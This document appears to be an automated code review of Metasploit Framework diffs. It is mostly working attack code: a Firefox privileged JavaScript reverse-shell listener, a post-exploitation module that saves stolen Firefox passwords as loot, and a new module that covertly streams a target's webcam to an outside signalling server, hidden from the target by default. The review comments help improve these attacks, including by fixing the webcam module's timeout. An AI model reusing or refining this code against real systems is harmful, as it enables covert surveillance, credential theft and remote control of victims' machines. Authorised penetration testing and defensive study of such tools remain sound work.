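Review bot: The listener now hands `readUntilToken`'s callback the raw buffer, whereas the replaced handler applied `.trim()` to the data before `runCmd`; for untokenised input the helper's newline fallback delivers the buffer with its trailing newline intact, so `runCmd` now receives newline-terminated commands unless it trims on its own (its source is outside the hunk). Either trim in the callback, `runCmd(data.trim(), function(err, output) { ... })`, or state the new contract in a comment next to `#{read_until_token_source}`. The same applies to the reverse_tcp payload changed further down in this commit. The enclosing `generate` heredoc continues outside the hunk.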


@ -6,6 +6,7 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
@ -45,15 +46,16 @@ module Metasploit3
.createInstance(Components.interfaces.nsIInputStreamPump);
pump.init(inStream, -1, -1, 0, 0, true);
#{read_until_token_source}
var listener = {
onStartRequest: function(request, context) {},
onStopRequest: function(request, context) {},
onDataAvailable: function(request, context, stream, offset, count) {
var data = NetUtil.readInputStreamToString(stream, count).trim();
onDataAvailable: readUntilToken(function(data) {
runCmd(data, function(err, output) {
if (!err) outStream.write(output, output.length);
});
}
})
};
#{run_cmd_source}
@ -63,4 +65,5 @@ module Metasploit3
EOS
end
end


@ -37,8 +37,12 @@ class Metasploit3 < Msf::Post
entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
end
file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)
print_good("Saved #{passwords.length} passwords to #{file}")
if passwords.length > 0
file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)
print_good("Saved #{passwords.length} passwords to #{file}")
else
print_warning("No passwords were found in Firefox.")
end
rescue JSON::ParserError => e
print_warning(results)
end
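Review bot: `if passwords.length > 0` is `unless passwords.empty?` in idiomatic Ruby, and moving `store_loot` under that guard is the right call since it no longer writes an empty loot file. The `rescue JSON::ParserError => e` below it binds `e` without using it; either drop the binding or include `e.message` in the warning so the user learns why the results could not be parsed. The enclosing method continues outside the hunk.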


@ -0,0 +1,109 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
include Msf::Post::WebRTC
def initialize(info={})
super(update_info(info,
'Name' => 'Firefox Webcam Chat on Privileged Javascript Shell',
'Description' => %q{
This module allows streaming a webcam from a Firefox Privileged Javascript Shell.
},
'License' => MSF_LICENSE,
'Author' => [ 'joev' ],
'DisclosureDate' => 'May 13 2014'
))
register_options([
OptBool.new('CLOSE', [false, "Forcibly close previous chat session", false]),
OptBool.new('VISIBLE', [false, "Show a window containing the chat to the target", false]),
OptInt.new('TIMEOUT', [false, "End the chat session after this many seconds", -1]),
OptString.new('ICESERVER', [true, "The ICE server that sets up the P2P connection", 'wsnodejs.jit.su:80'])
], self.class)
end
def run
unless os_check
print_error "Windows versions of Firefox are not supported at this time [RM #8810]."
return
end
server = datastore['ICESERVER']
offerer_id = Rex::Text.rand_text_alphanumeric(10)
channel = Rex::Text.rand_text_alphanumeric(20)
result = js_exec(js_payload(server, offerer_id, channel))
if datastore['CLOSE']
print_status "Stream closed."
else
if result.present?
print_status result
connect_video_chat(server, channel, offerer_id)
else
print_warning "No response received"
end
end
end
def os_check
user_agent = js_exec(%Q|
return Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
|)
user_agent !~ /windows/i
end
def js_payload(server, offerer_id, channel)
interface = load_interface('offerer.html')
api = load_api_code
interface.gsub!(/\=SERVER\=/, server)
interface.gsub!(/\=CHANNEL\=/, channel)
interface.gsub!(/\=OFFERERID\=/, offerer_id)
if datastore['TIMEOUT'] > 0
api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT']*1000}); "
end
url = if datastore['CLOSE']
'"about:blank"'
else
'"data:text/html;base64,"+html'
end
name = if datastore['VISIBLE']
Rex::Text.rand_text_alphanumeric(10)
else
'_self'
end
%Q|
(function(send){
try {
var AppShellService = Components
.classes["@mozilla.org/appshell/appShellService;1"]
.getService(Components.interfaces.nsIAppShellService);
var html = "#{Rex::Text.encode_base64(interface)}";
var url = #{url};
AppShellService.hiddenDOMWindow.openDialog(url, '#{name}', 'chrome=1,width=1100,height=600');
send("Streaming webcam...");
} catch (e) {
send(e);
}
})(send);
|
end
end
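Review bot: In js_payload the `api` string is loaded and, when TIMEOUT is set, extended with the `setTimeout` snippet, but it is never inserted anywhere: `load_interface` has already replaced the `=WEBRTCAPIJS=` placeholder, and only `interface` is base64-encoded into the payload, so the TIMEOUT option has no effect and `api` is dead code. Put the snippet into the interface instead, e.g. `interface << "<script>setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT'] * 1000});</script>" if datastore['TIMEOUT'] > 0`, and drop `api`. The ICESERVER default is a third-party host and the interface page connects to it over plaintext `ws://`, so the option description should say that the signalling exchange is visible to that server and on the wire; `result.present?` also assumes ActiveSupport is loaded.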


@ -30,7 +30,7 @@ class Metasploit3 < Msf::Post
'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
],
'Platform' => [ 'windows'],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))


@ -40,7 +40,7 @@ class Metasploit3 < Msf::Post
},
'License' => MSF_LICENSE,
'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
'Platform' => 'windows',
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))


@ -27,7 +27,7 @@ class Metasploit3 < Msf::Post
[ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],
[ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]
],
'Platform' => [ 'windows' ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
},
'License' => MSF_LICENSE,
'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
'Platform' => [ 'windows' ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))


@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
[
[ 'URL', 'http://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]
],
'Platform' => 'windows',
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))


@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
PORT will be used depending of the mode configured.},
'License' => MSF_LICENSE,
'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
'Platform' => [ 'windows' ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ]
))


@ -11,7 +11,7 @@ require 'find'
require 'time'
CHECK_OLD_RUBIES = !!ENV['MSF_CHECK_OLD_RUBIES']
SUPRESS_INFO_MESSAGES = !!ENV['MSF_SUPPRESS_INFO_MESSAGES']
SUPPRESS_INFO_MESSAGES = !!ENV['MSF_SUPPRESS_INFO_MESSAGES']
if CHECK_OLD_RUBIES
require 'rvm'
@ -92,7 +92,7 @@ class Msftidy
# Display an info message. Info messages do not alter the exit status.
#
def info(txt, line=0)
return if SUPRESS_INFO_MESSAGES
return if SUPPRESS_INFO_MESSAGES
line_msg = (line>0) ? ":#{line}" : ''
puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}"
end